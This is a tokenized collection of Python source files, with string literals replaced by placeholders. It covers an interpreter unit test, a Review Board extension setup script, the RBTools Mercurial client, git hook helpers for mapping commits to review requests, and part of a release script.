<EOL> mock_getmembers . side_effect = [ <EOL> [ ] , <EOL> [ ] , <EOL> [ ] , <EOL> [ ( "<STR_LIT>" , TestExploit ) , ( '<STR_LIT>' , mock . MagicMock ) ] <EOL> ] <EOL> self . interpreter . load_modules ( ) <EOL> mock_walk . assert_called_once_with ( self . interpreter . modules_directory ) <EOL> self . assertEqual ( <EOL> mock_import_module . mock_calls , <EOL> [ <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) <EOL> ] <EOL> ) <EOL> self . assertEqual ( <EOL> mock_getmembers . mock_calls , <EOL> [ <EOL> mock . call ( <NUM_LIT:1> , inspect . isclass ) , <EOL> mock . call ( <NUM_LIT:2> , inspect . isclass ) , <EOL> mock . call ( <NUM_LIT:4> , inspect . isclass ) , <EOL> mock . call ( <NUM_LIT:5> , inspect . isclass ) , <EOL> ] <EOL> ) <EOL> self . assertEqual ( <EOL> self . interpreter . modules , <EOL> [ <EOL> '<STR_LIT>' <EOL> ] <EOL> ) <EOL> self . assertEqual ( <EOL> self . interpreter . modules_with_errors , <EOL> { <EOL> "<STR_LIT>" : import_error , <EOL> '<STR_LIT>' : import_error , <EOL> } <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_debug ( self , mocked_print_error , mocked_print_info , ) : <EOL> self . interpreter . modules_with_errors = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> self . interpreter . command_debug ( ) <EOL> self . assertItemsEqual ( <EOL> mocked_print_info . mock_calls , <EOL> [ <EOL> mock . call ( "<STR_LIT>" ) , <EOL> mock . call ( "<STR_LIT>" ) , <EOL> mock . call ( "<STR_LIT>" ) , <EOL> ] <EOL> ) <EOL> self . assertItemsEqual ( <EOL> mocked_print_error . mock_calls , <EOL> [ <EOL> mock . call ( "<STR_LIT>" , '<STR_LIT:\n>' ) , <EOL> mock . call ( "<STR_LIT>" , '<STR_LIT:\n>' ) , <EOL> mock . call ( "<STR_LIT>" , '<STR_LIT:\n>' ) , <EOL> ] <EOL> ) <EOL> def test_command_exit ( self ) : <EOL> with self . assertRaises ( KeyboardInterrupt ) : <EOL> self . interpreter . command_exit ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from setuptools import find_packages <EOL> from reviewboard . extensions . packaging import setup <EOL> from reviewbotext import get_package_version <EOL> PACKAGE = "<STR_LIT>" <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = get_package_version ( ) , <EOL> license = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> author = "<STR_LIT>" , <EOL> maintainer = "<STR_LIT>" , <EOL> include_package_data = True , <EOL> packages = find_packages ( ) , <EOL> entry_points = { <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> } , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> import logging <EOL> import os <EOL> import re <EOL> import uuid <EOL> from six . moves . urllib . parse import urlsplit , urlunparse <EOL> from rbtools . clients import PatchResult , SCMClient , RepositoryInfo <EOL> from rbtools . clients . errors import ( InvalidRevisionSpecError , <EOL> TooManyRevisionsError ) <EOL> from rbtools . clients . svn import SVNClient <EOL> from rbtools . utils . checks import check_install <EOL> from rbtools . utils . filesystem import make_empty_files <EOL> from rbtools . utils . console import edit_text <EOL> from rbtools . utils . process import die , execute <EOL> class MercurialClient ( SCMClient ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> PRE_CREATION = '<STR_LIT>' <EOL> PRE_CREATION_DATE = '<STR_LIT>' <EOL> supports_diff_exclude_patterns = True <EOL> can_branch = True <EOL> can_bookmark = True <EOL> def __init__ ( self , ** kwargs ) : <EOL> super ( MercurialClient , self ) . __init__ ( ** kwargs ) <EOL> self . hgrc = { } <EOL> self . _type = '<STR_LIT>' <EOL> self . _remote_path = ( ) <EOL> self . _initted = False <EOL> self . _hg_env = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> } <EOL> self . _hgext_path = os . path . normpath ( os . path . join ( <EOL> os . path . dirname ( __file__ ) , <EOL> '<STR_LIT:..>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . _remote_path_candidates = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:default>' ] <EOL> @ property <EOL> def hidden_changesets_supported ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> result = execute ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:0>' ] , <EOL> ignore_errors = True , <EOL> with_errors = False , <EOL> none_on_ignored_error = True ) <EOL> self . _hidden_changesets_supported = result is not None <EOL> return self . _hidden_changesets_supported <EOL> @ property <EOL> def hg_root ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> root = execute ( [ '<STR_LIT>' , '<STR_LIT:root>' ] , env = self . _hg_env , <EOL> ignore_errors = True ) <EOL> if not root . startswith ( '<STR_LIT>' ) : <EOL> self . _hg_root = root . strip ( ) <EOL> else : <EOL> self . _hg_root = None <EOL> return self . _hg_root <EOL> def _init ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _initted or not self . hg_root : <EOL> return <EOL> self . _load_hgrc ( ) <EOL> svn_info = execute ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:info>' ] , ignore_errors = True ) <EOL> if ( not svn_info . startswith ( '<STR_LIT>' ) and <EOL> not svn_info . startswith ( '<STR_LIT>' ) and <EOL> not svn_info . lower ( ) . startswith ( '<STR_LIT>' ) ) : <EOL> self . _type = '<STR_LIT>' <EOL> self . _svn_info = svn_info <EOL> else : <EOL> self . _type = '<STR_LIT>' <EOL> for candidate in self . _remote_path_candidates : <EOL> rc_key = '<STR_LIT>' % candidate <EOL> if rc_key in self . hgrc : <EOL> self . _remote_path = ( candidate , self . hgrc [ rc_key ] ) <EOL> logging . debug ( '<STR_LIT>' % <EOL> self . _remote_path ) <EOL> break <EOL> self . _initted = True <EOL> def get_repository_info ( self ) : <EOL> """<STR_LIT>""" <EOL> if not check_install ( [ '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> logging . debug ( '<STR_LIT>' ) <EOL> return None <EOL> self . _init ( ) <EOL> if not self . hg_root : <EOL> return None <EOL> if self . _type == '<STR_LIT>' : <EOL> return self . _calculate_hgsubversion_repository_info ( self . _svn_info ) <EOL> else : <EOL> path = self . hg_root <EOL> base_path = '<STR_LIT:/>' <EOL> if self . _remote_path : <EOL> path = self . _remote_path [ <NUM_LIT:1> ] <EOL> base_path = '<STR_LIT>' <EOL> return RepositoryInfo ( path = path , base_path = base_path , <EOL> supports_parent_diffs = True ) <EOL> def parse_revision_spec ( self , revisions = [ ] ) : <EOL> """<STR_LIT>""" <EOL> self . _init ( ) <EOL> n_revisions = len ( revisions ) <EOL> if n_revisions == <NUM_LIT:1> : <EOL> revisions = re . split ( r'<STR_LIT>' , revisions [ <NUM_LIT:0> ] ) <EOL> n_revisions = len ( revisions ) <EOL> result = { } <EOL> if n_revisions == <NUM_LIT:0> : <EOL> if self . _type == '<STR_LIT>' : <EOL> result [ '<STR_LIT>' ] = self . _get_parent_for_hgsubversion ( ) <EOL> result [ '<STR_LIT>' ] = '<STR_LIT:.>' <EOL> else : <EOL> outgoing = self . _get_bottom_and_top_outgoing_revs_for_remote ( rev = '<STR_LIT:.>' ) <EOL> if outgoing [ <NUM_LIT:0> ] is None or outgoing [ <NUM_LIT:1> ] is None : <EOL> raise InvalidRevisionSpecError ( <EOL> '<STR_LIT>' ) <EOL> result [ '<STR_LIT>' ] = self . _identify_revision ( outgoing [ <NUM_LIT:0> ] ) <EOL> result [ '<STR_LIT>' ] = self . _identify_revision ( outgoing [ <NUM_LIT:1> ] ) <EOL> result [ '<STR_LIT>' ] = result [ '<STR_LIT>' ] <EOL> if self . has_pending_changes ( ) : <EOL> logging . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if self . options . parent_branch : <EOL> result [ '<STR_LIT>' ] = result [ '<STR_LIT>' ] <EOL> result [ '<STR_LIT>' ] = self . _identify_revision ( <EOL> self . options . parent_branch ) <EOL> elif n_revisions == <NUM_LIT:1> : <EOL> result [ '<STR_LIT>' ] = self . _identify_revision ( revisions [ <NUM_LIT:0> ] ) <EOL> result [ '<STR_LIT>' ] = result [ '<STR_LIT>' ] <EOL> result [ '<STR_LIT>' ] = self . _execute ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , result [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) . split ( ) [ <NUM_LIT:0> ] <EOL> if len ( result [ '<STR_LIT>' ] ) != <NUM_LIT:12> : <EOL> raise InvalidRevisionSpecError ( <EOL> "<STR_LIT>" <EOL> ) <EOL> elif n_revisions == <NUM_LIT:2> : <EOL> result [ '<STR_LIT>' ] = self . _identify_revision ( revisions [ <NUM_LIT:0> ] ) <EOL> result [ '<STR_LIT>' ] = self . _identify_revision ( revisions [ <NUM_LIT:1> ] ) <EOL> else : <EOL> raise TooManyRevisionsError <EOL> if '<STR_LIT>' not in result or '<STR_LIT>' not in result : <EOL> raise InvalidRevisionSpecError ( <EOL> '<STR_LIT>' % revisions ) <EOL> if self . _type == '<STR_LIT>' and '<STR_LIT>' not in result : <EOL> outgoing = self . _get_outgoing_changesets ( self . _get_remote_branch ( ) , <EOL> rev = result [ '<STR_LIT>' ] ) <EOL> logging . debug ( '<STR_LIT>' , <EOL> len ( outgoing ) ) <EOL> if not outgoing : <EOL> return result <EOL> parent_base = self . _execute ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , outgoing [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) . split ( ) <EOL> if len ( parent_base ) == <NUM_LIT:0> : <EOL> raise Exception ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> result [ '<STR_LIT>' ] = parent_base [ <NUM_LIT:0> ] <EOL> logging . debug ( '<STR_LIT>' , <EOL> result [ '<STR_LIT>' ] ) <EOL> return result <EOL> def _identify_revision ( self , revision ) : <EOL> identify = self . _execute ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , str ( revision ) ] , <EOL> ignore_errors = True , none_on_ignored_error = True ) <EOL> if identify is None : <EOL> raise InvalidRevisionSpecError ( <EOL> '<STR_LIT>' % revision ) <EOL> else : <EOL> return identify . split ( ) [ <NUM_LIT:0> ] <EOL> def _calculate_hgsubversion_repository_info ( self , svn_info ) : <EOL> def _info ( r ) : <EOL> m = re . search ( r , svn_info , re . M ) <EOL> if m : <EOL> return urlsplit ( m . group ( <NUM_LIT:1> ) ) <EOL> else : <EOL> return None <EOL> self . _type = '<STR_LIT>' <EOL> root = _info ( r'<STR_LIT>' ) <EOL> url = _info ( r'<STR_LIT>' ) <EOL> if not ( root and url ) : <EOL> return None <EOL> scheme , netloc , path , _ , _ = root <EOL> root = urlunparse ( [ scheme , root . netloc . split ( "<STR_LIT:@>" ) [ - <NUM_LIT:1> ] , path , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> base_path = url . path [ len ( path ) : ] <EOL> return RepositoryInfo ( path = root , base_path = base_path , <EOL> supports_parent_diffs = True ) <EOL> def _load_hgrc ( self ) : <EOL> for line in execute ( [ '<STR_LIT>' , '<STR_LIT>' ] , split_lines = True ) : <EOL> line = line . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> if len ( line ) == <NUM_LIT:2> : <EOL> key , value = line <EOL> else : <EOL> key = line [ <NUM_LIT:0> ] <EOL> value = '<STR_LIT>' <EOL> self . hgrc [ key ] = value . strip ( ) <EOL> def get_raw_commit_message ( self , revisions ) : <EOL> """<STR_LIT>""" <EOL> rev1 = revisions [ '<STR_LIT>' ] <EOL> rev2 = revisions [ '<STR_LIT>' ] <EOL> delim = str ( uuid . uuid1 ( ) ) <EOL> descs = self . _execute ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' % ( rev1 , rev2 ) , <EOL> '<STR_LIT>' , '<STR_LIT>' % delim ] , <EOL> env = self . _hg_env , <EOL> results_unicode = False ) <EOL> descs = descs . split ( delim ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> return b'<STR_LIT>' . join ( [ desc . strip ( ) for desc in descs ] ) <EOL> def diff ( self , revisions , include_files = [ ] , exclude_patterns = [ ] , <EOL> extra_args = [ ] ) : <EOL> """<STR_LIT>""" <EOL> self . _init ( ) <EOL> diff_cmd = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> if self . _type == '<STR_LIT>' : <EOL> diff_cmd . append ( '<STR_LIT>' ) <EOL> diff_cmd += include_files <EOL> for pattern in exclude_patterns : <EOL> diff_cmd . append ( '<STR_LIT>' ) <EOL> diff_cmd . append ( pattern ) <EOL> diff = self . _execute ( <EOL> diff_cmd + [ '<STR_LIT>' , revisions [ '<STR_LIT>' ] , '<STR_LIT>' , revisions [ '<STR_LIT>' ] ] , <EOL> env = self . _hg_env , log_output_on_error = False , results_unicode = False ) <EOL> supports_empty_files = self . supports_empty_files ( ) <EOL> if supports_empty_files : <EOL> diff = self . _handle_empty_files ( diff , revisions [ '<STR_LIT>' ] , <EOL> revisions [ '<STR_LIT>' ] , <EOL> exclude_files = exclude_patterns ) <EOL> if '<STR_LIT>' in revisions : <EOL> base_commit_id = revisions [ '<STR_LIT>' ] <EOL> parent_diff = self . _execute ( <EOL> diff_cmd + [ '<STR_LIT>' , base_commit_id , '<STR_LIT>' , revisions [ '<STR_LIT>' ] ] , <EOL> env = self . _hg_env , results_unicode = False ) <EOL> if supports_empty_files : <EOL> parent_diff = self . _handle_empty_files ( <EOL> parent_diff , <EOL> base_commit_id , <EOL> revisions [ '<STR_LIT>' ] , <EOL> exclude_files = exclude_patterns ) <EOL> else : <EOL> base_commit_id = revisions [ '<STR_LIT>' ] <EOL> parent_diff = None <EOL> base_commit_id = self . _execute ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , base_commit_id , '<STR_LIT>' ] , <EOL> env = self . _hg_env , results_unicode = False ) <EOL> return { <EOL> '<STR_LIT>' : diff , <EOL> '<STR_LIT>' : parent_diff , <EOL> '<STR_LIT>' : revisions . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : base_commit_id , <EOL> } <EOL> def _handle_empty_files ( self , diff , base , tip , exclude_files = [ ] ) : <EOL> """<STR_LIT>""" <EOL> base_files = self . _get_files_in_changeset ( base ) <EOL> tip_files = self . _get_files_in_changeset ( tip ) <EOL> if base_files == tip_files : <EOL> return diff <EOL> tip_empty_files = self . _get_files_in_changeset ( tip , get_empty = True ) <EOL> added_empty_files = tip_empty_files - base_files <EOL> base_empty_files = self . _get_files_in_changeset ( base , get_empty = True ) <EOL> deleted_empty_files = base_empty_files - tip_files <EOL> if not ( added_empty_files or deleted_empty_files ) : <EOL> return diff <EOL> dates = execute ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , base , '<STR_LIT>' , tip , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> env = self . _hg_env ) <EOL> base_date , tip_date = dates . strip ( ) . split ( '<STR_LIT:\t>' ) <EOL> for filename in added_empty_files : <EOL> if filename not in exclude_files : <EOL> diff += ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( base , tip , filename , <EOL> self . PRE_CREATION , self . PRE_CREATION_DATE , <EOL> filename , tip_date ) ) . encode ( '<STR_LIT:utf-8>' ) <EOL> for filename in deleted_empty_files : <EOL> if filename not in exclude_files : <EOL> diff += ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( base , tip , filename , <EOL> filename , base_date , <EOL> self . PRE_CREATION , <EOL> self . PRE_CREATION_DATE ) ) . encode ( '<STR_LIT:utf-8>' ) <EOL> return diff <EOL> def _get_files_in_changeset ( self , rev , get_empty = False ) : <EOL> """<STR_LIT>""" <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , rev ] <EOL> if get_empty : <EOL> cmd . append ( '<STR_LIT>' ) <EOL> files = execute ( cmd , env = self . _hg_env , ignore_errors = True , <EOL> none_on_ignored_error = True ) <EOL> if files : <EOL> files = files . replace ( '<STR_LIT:\\>' , '<STR_LIT:/>' ) <EOL> return set ( files . splitlines ( ) ) <EOL> return set ( ) <EOL> def _get_parent_for_hgsubversion ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( getattr ( self . options , '<STR_LIT>' , None ) or <EOL> execute ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) . strip ( ) ) <EOL> def _get_remote_branch ( self ) : <EOL> """<STR_LIT>""" <EOL> remote = getattr ( self . options , '<STR_LIT>' , None ) <EOL> if not remote : <EOL> try : <EOL> remote = self . _remote_path [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> remote = None <EOL> if not remote : <EOL> die ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return remote <EOL> def create_commit ( self , message , author , run_editor , <EOL> files = [ ] , all_files = False ) : <EOL> """<STR_LIT>""" <EOL> if run_editor : <EOL> modified_message = edit_text ( message ) <EOL> else : <EOL> modified_message = message <EOL> hg_command = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , modified_message , <EOL> '<STR_LIT>' % ( author . fullname , author . email ) ] <EOL> execute ( hg_command + files ) <EOL> def _get_current_branch ( self ) : <EOL> """<STR_LIT>""" <EOL> return execute ( [ '<STR_LIT>' , '<STR_LIT>' ] , env = self . _hg_env ) . strip ( ) <EOL> def _get_bottom_and_top_outgoing_revs_for_remote ( self , rev = None ) : <EOL> """<STR_LIT>""" <EOL> remote = self . _get_remote_branch ( ) <EOL> current_branch = self . _get_current_branch ( ) <EOL> outgoing = [ o for o in self . _get_outgoing_changesets ( remote , rev = rev ) <EOL> if current_branch == o [ <NUM_LIT:2> ] ] <EOL> if outgoing : <EOL> top_rev , bottom_rev = self . _get_top_and_bottom_outgoing_revs ( outgoing ) <EOL> else : <EOL> top_rev = None <EOL> bottom_rev = None <EOL> return bottom_rev , top_rev <EOL> def _get_outgoing_changesets ( self , remote , rev = None ) : <EOL> """<STR_LIT>""" <EOL> outgoing_changesets = [ ] <EOL> args = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> remote ] <EOL> if rev : <EOL> args . extend ( [ '<STR_LIT>' , rev ] ) <EOL> raw_outgoing = execute ( args , <EOL> env = self . _hg_env , <EOL> extra_ignore_errors = ( <NUM_LIT:1> , ) ) <EOL> for line in raw_outgoing . splitlines ( ) : <EOL> if not line : <EOL> continue <EOL> if line . startswith ( '<STR_LIT>' ) : <EOL> continue <EOL> rev , node , branch = [ f . strip ( ) for f in line . split ( '<STR_LIT:\t>' ) ] <EOL> branch = branch or '<STR_LIT:default>' <EOL> if not rev . isdigit ( ) : <EOL> raise Exception ( '<STR_LIT>' % line ) <EOL> logging . debug ( '<STR_LIT>' % ( rev , node ) ) <EOL> outgoing_changesets . append ( ( int ( rev ) , node , branch ) ) <EOL> return outgoing_changesets <EOL> def _get_top_and_bottom_outgoing_revs ( self , outgoing_changesets ) : <EOL> revs = set ( t [ <NUM_LIT:0> ] for t in outgoing_changesets ) <EOL> top_rev = max ( revs ) <EOL> bottom_rev = min ( revs ) <EOL> for rev , node , branch in reversed ( outgoing_changesets ) : <EOL> parents = execute ( <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , str ( rev ) , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> env = self . _hg_env ) <EOL> parents = re . split ( '<STR_LIT>' , parents ) <EOL> parents = [ int ( p ) for p in parents if p != '<STR_LIT>' ] <EOL> parents = [ p for p in parents if p not in outgoing_changesets ] <EOL> if len ( parents ) > <NUM_LIT:0> : <EOL> bottom_rev = parents [ <NUM_LIT:0> ] <EOL> break <EOL> else : <EOL> bottom_rev = rev - <NUM_LIT:1> <EOL> bottom_rev = max ( <NUM_LIT:0> , bottom_rev ) <EOL> return top_rev , bottom_rev <EOL> def scan_for_server ( self , repository_info ) : <EOL> server_url = super ( MercurialClient , self ) . scan_for_server ( repository_info ) <EOL> if not server_url and self . hgrc . get ( '<STR_LIT>' ) : <EOL> server_url = self . hgrc . get ( '<STR_LIT>' ) . strip ( ) <EOL> if not server_url and self . _type == "<STR_LIT>" : <EOL> prop = SVNClient ( ) . scan_for_server_property ( repository_info ) <EOL> if prop : <EOL> return prop <EOL> return server_url <EOL> def _execute ( self , cmd , * args , ** kwargs ) : <EOL> if not self . hidden_changesets_supported and '<STR_LIT>' in cmd : <EOL> cmd = [ p for p in cmd if p != '<STR_LIT>' ] <EOL> cmd . extend ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % self . _hgext_path <EOL> ] ) <EOL> return execute ( cmd , * args , ** kwargs ) <EOL> def has_pending_changes ( self ) : <EOL> """<STR_LIT>""" <EOL> status = execute ( [ '<STR_LIT>' , '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> return status != '<STR_LIT>' <EOL> def apply_patch ( self , patch_file , base_path = None , base_dir = None , p = None , <EOL> revert = False ) : <EOL> """<STR_LIT>""" <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> if p : <EOL> cmd += [ '<STR_LIT>' , p ] <EOL> cmd . append ( patch_file ) <EOL> rc , data = self . _execute ( cmd , with_errors = True , return_error_code = True ) <EOL> return PatchResult ( applied = ( rc == <NUM_LIT:0> ) , patch_output = data ) <EOL> def apply_patch_for_empty_files ( self , patch , p_num , revert = False ) : <EOL> """<STR_LIT>""" <EOL> patched_empty_files = False <EOL> added_files = re . findall ( r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> % ( self . PRE_CREATION , <EOL> re . escape ( self . PRE_CREATION_DATE ) ) , patch ) <EOL> deleted_files = re . findall ( r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> % ( self . PRE_CREATION , <EOL> re . escape ( self . PRE_CREATION_DATE ) ) , <EOL> patch ) <EOL> if added_files : <EOL> added_files = self . _strip_p_num_slashes ( added_files , int ( p_num ) ) <EOL> make_empty_files ( added_files ) <EOL> result = execute ( [ '<STR_LIT>' , '<STR_LIT>' ] + added_files , ignore_errors = True , <EOL> none_on_ignored_error = True ) <EOL> if result is None : <EOL> logging . error ( '<STR_LIT>' , <EOL> '<STR_LIT:U+002CU+0020>' . join ( added_files ) ) <EOL> else : <EOL> patched_empty_files = True <EOL> if deleted_files : <EOL> deleted_files = self . _strip_p_num_slashes ( deleted_files , <EOL> int ( p_num ) ) <EOL> result = execute ( [ '<STR_LIT>' , '<STR_LIT>' ] + deleted_files , <EOL> ignore_errors = True , none_on_ignored_error = True ) <EOL> if result is None : <EOL> logging . error ( '<STR_LIT>' , <EOL> '<STR_LIT:U+002CU+0020>' . join ( deleted_files ) ) <EOL> else : <EOL> patched_empty_files = True <EOL> return patched_empty_files <EOL> def supports_empty_files ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . capabilities and <EOL> self . capabilities . has_capability ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> def get_current_bookmark ( self ) : <EOL> """<STR_LIT>""" <EOL> return execute ( [ '<STR_LIT>' , '<STR_LIT:id>' , '<STR_LIT>' ] , ignore_errors = True ) . strip ( ) </s>
<s> import six <EOL> from collections import defaultdict <EOL> from copy import deepcopy <EOL> from rbtools . hooks . common import execute , get_review_request_id <EOL> def get_branch_name ( ref_name ) : <EOL> """<STR_LIT>""" <EOL> branch_ref_prefix = '<STR_LIT>' <EOL> if ref_name . startswith ( branch_ref_prefix ) : <EOL> return ref_name [ len ( branch_ref_prefix ) : ] <EOL> def get_commit_hashes ( old_rev , new_rev ) : <EOL> """<STR_LIT>""" <EOL> git_command = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> % ( old_rev , new_rev ) ] <EOL> return execute ( git_command ) . split ( '<STR_LIT:\n>' ) <EOL> def get_unique_commit_hashes ( ref_name , new_rev ) : <EOL> """<STR_LIT>""" <EOL> git_command = [ '<STR_LIT>' , '<STR_LIT>' , new_rev , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> git_command . extend ( get_excluded_branches ( ref_name ) ) <EOL> return execute ( git_command ) . strip ( ) . split ( '<STR_LIT:\n>' ) <EOL> def get_excluded_branches ( ref_name ) : <EOL> """<STR_LIT>""" <EOL> git_command = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> all_branches = execute ( git_command ) . strip ( ) . split ( '<STR_LIT:\n>' ) <EOL> return [ branch . strip ( ) for branch in all_branches if branch != ref_name ] <EOL> def get_branches_containing_commit ( commit_hash ) : <EOL> """<STR_LIT>""" <EOL> git_command = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , commit_hash ] <EOL> branches = execute ( git_command ) . replace ( '<STR_LIT:*>' , '<STR_LIT>' ) . split ( '<STR_LIT:\n>' ) <EOL> return [ branch . strip ( ) for branch in branches ] <EOL> def get_commit_message ( commit ) : <EOL> """<STR_LIT>""" <EOL> git_command = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , commit ] <EOL> return execute ( git_command ) . strip ( ) <EOL> def get_review_id_to_commits_map ( lines , regex ) : <EOL> """<STR_LIT>""" <EOL> review_id_to_commits_map = defaultdict ( list ) <EOL> new_branches = [ ] <EOL> null_sha1 = '<STR_LIT:0>' * <NUM_LIT> <EOL> for line in lines : <EOL> old_rev , new_rev , ref_name = line . split ( ) <EOL> branch_name = get_branch_name ( ref_name ) <EOL> if not branch_name or new_rev == null_sha1 : <EOL> continue <EOL> if old_rev == null_sha1 : <EOL> new_branches . append ( branch_name ) <EOL> commit_hashes = get_unique_commit_hashes ( ref_name , new_rev ) <EOL> else : <EOL> commit_hashes = get_commit_hashes ( old_rev , new_rev ) <EOL> for commit_hash in commit_hashes : <EOL> if commit_hash : <EOL> commit_message = get_commit_message ( commit_hash ) <EOL> review_request_id = get_review_request_id ( regex , <EOL> commit_message ) <EOL> commit = '<STR_LIT>' % ( branch_name , commit_hash ) <EOL> review_id_to_commits_map [ review_request_id ] . append ( commit ) <EOL> if new_branches : <EOL> review_id_to_commits_map_copy = deepcopy ( review_id_to_commits_map ) <EOL> for review_id , commit_list in six . iteritems ( <EOL> review_id_to_commits_map_copy ) : <EOL> for commit in commit_list : <EOL> commit_branch = commit [ : commit . find ( '<STR_LIT:(>' ) - <NUM_LIT:1> ] <EOL> if commit_branch in new_branches : <EOL> continue <EOL> commit_hash = commit [ commit . find ( '<STR_LIT:(>' ) + <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> commit_branches = get_branches_containing_commit ( commit_hash ) <EOL> for branch in set ( new_branches ) . intersection ( commit_branches ) : <EOL> new_commit = '<STR_LIT>' % ( branch , commit_hash ) <EOL> review_id_to_commits_map [ review_id ] . append ( new_commit ) <EOL> return review_id_to_commits_map </s>
<s> from __future__ import print_function , unicode_literals <EOL> import os <EOL> import shutil <EOL> import subprocess <EOL> import sys <EOL> import tempfile <EOL> from optparse import OptionParser <EOL> options = None <EOL> def die ( msg ) : <EOL> sys . stderr . write ( msg ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def clone_git_tree ( git_dir ) : <EOL> new_git_dir = tempfile . mkdtemp ( prefix = '<STR_LIT>' ) <EOL> os . chdir ( new_git_dir ) <EOL> execute ( [ '<STR_LIT>' , '<STR_LIT>' , git_dir , '<STR_LIT:.>' ] ) <EOL> return new_git_dir <EOL> def execute ( cmdline , return_errcode = False , show_output = True ) : <EOL> if isinstance ( cmdline , list ) : <EOL> print ( "<STR_LIT>" % subprocess . list2cmdline ( cmdline ) ) <EOL> else : <EOL> print ( "<STR_LIT>" % cmdline ) <EOL> p = subprocess . Popen ( cmdline , <EOL> shell = False , <EOL> stdout = subprocess . PIPE ) <EOL> s = '<STR_LIT>' <EOL> for data in p . stdout . readlines ( ) : <EOL> s += data <EOL> if show_output : <EOL> sys . stdout . write ( data ) <EOL> rc = p . wait ( ) <EOL> if return_errcode : <EOL> return s , 